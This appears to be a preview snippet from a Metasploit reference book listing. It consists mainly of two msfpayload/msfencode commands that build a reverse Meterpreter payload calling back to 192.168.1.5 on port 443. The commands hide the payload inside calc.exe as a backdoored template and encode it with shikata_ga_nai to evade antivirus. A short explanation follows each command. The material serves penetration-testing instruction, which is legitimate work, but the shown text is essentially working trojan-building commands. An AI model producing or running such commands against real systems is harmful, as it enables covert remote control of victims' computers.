July 2011
Intermediate to advanced
328 pages
9h 1m
English
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exeCreate a reverse Meterpreter payload connecting back to 192.168.1.5 on port 443 using calc.exe as a template to backdoor. Keep execution flow within the application for it to continue to work, and output the shikata_ga_nai encoded payload to payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exeCreate a reverse Meterpreter payload connecting back to 192.168.1.5 on port 443 using calc.exe as a template to backdoor. Does not keep execution flow within the application and will not prompt ...
Read now
Unlock full access